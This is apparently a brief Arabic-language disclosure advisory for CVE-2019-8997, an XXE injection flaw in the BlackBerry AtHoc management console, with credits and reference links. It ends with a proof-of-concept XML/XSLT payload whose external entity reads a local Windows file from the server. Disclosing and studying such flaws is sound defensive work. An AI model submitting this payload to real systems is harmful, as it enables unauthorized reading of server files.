
ثغرة XML External Entity Injection (XXE) في نظام الإدارة (وحدة التحكم) في BlackBerry AtHoc الإصدارات الأقدم من 7.6 HF-567 قد تسمح للمهاجم بقراءة أي ملفات محلية من خادم التطبيق أو إرسال طلبات عبر الشبكة من خلال إدخال XML مُصمّم بشكل ضار في أحد الحقول الموجودة.
تمثل ثغرة حقن كيان خارجي XML (XXE) في نظام الإدارة (وحدة التحكم) في BlackBerry AtHoc للإصدارات الأقدم من 7.6 HF-567، إمكانية تسمح للمهاجم بقراءة ملفات محلية عشوائية من خادم التطبيق أو تقديم طلبات على الشبكة عن طريق إدخال XML مُصمم بشكل خبيث في حقل موجود.
Nolan B. Kennedy (nxkennedy)
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/
<!DOCTYPE doc [
<!ELEMENT doc ANY >
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">
<doc>&foo;</doc>
<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>